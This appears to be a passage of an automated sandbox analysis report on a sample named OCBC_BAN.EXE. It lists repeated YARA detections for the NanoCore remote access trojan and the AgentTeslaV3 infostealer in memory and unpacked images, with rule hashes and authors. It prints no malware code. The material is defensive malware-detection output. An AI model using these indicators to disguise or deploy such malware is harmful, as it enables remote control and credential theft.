Source: Process Memory Space: OCBC_BAN.EXE PID: 4500, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: OCBC_BAN.EXE PID: 3524, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: OCBC_BAN.EXE PID: 3524, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe, type: DROPPED	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen

.NET source code contains very large array initializations

Source: Pubrtkzyqpdcef1.exe.0.dr, u003cPrivateImplementationDetailsu003eu007b709DF250u002dC716u002d4F4Eu002dB078u002dD4183B01CCB2u007d/u0039DE03333u002d9F21u002d4AC9u002d9E4Eu002dA76868BFFFA5.cs	Large array initialization: .cctor: array initializer size 11638
Source: 9.0.Pubrtkzyqpdcef1.exe.e30000.3.unpack, u003cPrivateImplementationDetailsu003eu007b709DF250u002dC716u002d4F4Eu002dB078u002dD4183B01CCB2u007d/u0039DE03333u002d9F21u002d4AC9u002d9E4Eu002dA76868BFFFA5.cs	Large array initialization: .cctor: array initializer size 11638
Source: 9.2.Pubrtkzyqpdcef1.exe.e30000.0.unpack, u003cPrivateImplementationDetailsu003eu007b709DF250u002dC716u002d4F4Eu002dB078u002dD4183B01CCB2u007d/u0039DE03333u002d9F21u002d4AC9u002d9E4Eu002dA76868BFFFA5.cs	Large array initialization: .cctor: array initializer size 11638
Source: 9.0.Pubrtkzyqpdcef1.exe.e30000.1.unpack, u003cPrivateImplementationDetailsu003eu007b709DF250u002dC716u002d4F4Eu002dB078u002dD4183B01CCB2u007d/u0039DE03333u002d9F21u002d4AC9u002d9E4Eu002dA76868BFFFA5.cs	Large array initialization: .cctor: array initializer size 11638

Source: OCBC_BAN.EXE

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Source: 12.2.OCBC_BAN.EXE.5ba0000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.2.OCBC_BAN.EXE.5ba0000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.2.OCBC_BAN.EXE.5ba0000.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0.2.OCBC_BAN.EXE.2cd8784.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.OCBC_BAN.EXE.2cd8784.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.OCBC_BAN.EXE.2cd8784.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0.2.OCBC_BAN.EXE.2cd8784.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.0.OCBC_BAN.EXE.400000.10.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.0.OCBC_BAN.EXE.400000.10.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.0.OCBC_BAN.EXE.400000.10.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 12.0.OCBC_BAN.EXE.400000.10.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.0.Pubrtkzyqpdcef1.exe.e30000.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 12.2.OCBC_BAN.EXE.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.2.OCBC_BAN.EXE.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.2.OCBC_BAN.EXE.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 12.2.OCBC_BAN.EXE.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.OCBC_BAN.EXE.3ce2ed0.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.OCBC_BAN.EXE.3ce2ed0.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.OCBC_BAN.EXE.3ce2ed0.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0.2.OCBC_BAN.EXE.3ce2ed0.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.3.OCBC_BAN.EXE.a7b3e38.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 12.0.OCBC_BAN.EXE.400000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.0.OCBC_BAN.EXE.400000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.0.OCBC_BAN.EXE.400000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 12.0.OCBC_BAN.EXE.400000.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.0.Pubrtkzyqpdcef1.exe.e30000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.OCBC_BAN.EXE.3ce2ed0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.OCBC_BAN.EXE.3ce2ed0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.OCBC_BAN.EXE.3ce2ed0.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0.2.OCBC_BAN.EXE.3ce2ed0.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.2.OCBC_BAN.EXE.5300000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.2.OCBC_BAN.EXE.5300000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.2.OCBC_BAN.EXE.5300000.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0.3.OCBC_BAN.EXE.a803e58.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.OCBC_BAN.EXE.3d32ef0.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.OCBC_BAN.EXE.3d32ef0.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.OCBC_BAN.EXE.3d32ef0.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0.2.OCBC_BAN.EXE.3d32ef0.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.2.OCBC_BAN.EXE.3a1ff24.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.2.OCBC_BAN.EXE.3a1ff24.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.2.OCBC_BAN.EXE.3a1ff24.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 9.2.Pubrtkzyqpdcef1.exe.e30000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 12.0.OCBC_BAN.EXE.400000.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.0.OCBC_BAN.EXE.400000.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.0.OCBC_BAN.EXE.400000.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 12.0.OCBC_BAN.EXE.400000.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.0.OCBC_BAN.EXE.400000.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.0.OCBC_BAN.EXE.400000.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.0.OCBC_BAN.EXE.400000.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 12.0.OCBC_BAN.EXE.400000.8.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.0.Pubrtkzyqpdcef1.exe.e30000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.3.OCBC_BAN.EXE.a7b3e38.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.3.OCBC_BAN.EXE.a803e58.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 12.2.OCBC_BAN.EXE.3a1b0ee.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.2.OCBC_BAN.EXE.3a1b0ee.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.2.OCBC_BAN.EXE.3a1b0ee.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 12.2.OCBC_BAN.EXE.3a1b0ee.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.2.OCBC_BAN.EXE.3a2454d.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.2.OCBC_BAN.EXE.3a2454d.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.2.OCBC_BAN.EXE.3a2454d.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0.2.OCBC_BAN.EXE.3cbaeb0.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.OCBC_BAN.EXE.3cbaeb0.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.OCBC_BAN.EXE.3cbaeb0.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0.2.OCBC_BAN.EXE.3cbaeb0.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.2.OCBC_BAN.EXE.5ba4629.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.2.OCBC_BAN.EXE.5ba4629.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.2.OCBC_BAN.EXE.5ba4629.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0.2.OCBC_BAN.EXE.2cd8784.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.OCBC_BAN.EXE.2cd8784.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.OCBC_BAN.EXE.2cd8784.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0.2.OCBC_BAN.EXE.2cd8784.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.2.OCBC_BAN.EXE.5ba0000.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.2.OCBC_BAN.EXE.5ba0000.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.2.OCBC_BAN.EXE.5ba0000.9.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 12.0.OCBC_BAN.EXE.400000.12.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.0.OCBC_BAN.EXE.400000.12.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.0.OCBC_BAN.EXE.400000.12.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 12.0.OCBC_BAN.EXE.400000.12.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.0.Pubrtkzyqpdcef1.exe.e30000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.OCBC_BAN.EXE.3cbaeb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.OCBC_BAN.EXE.3cbaeb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.OCBC_BAN.EXE.3cbaeb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0.2.OCBC_BAN.EXE.3cbaeb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.2.OCBC_BAN.EXE.3a1ff24.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.2.OCBC_BAN.EXE.3a1ff24.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.2.OCBC_BAN.EXE.3a1ff24.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 12.2.OCBC_BAN.EXE.2a39560.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
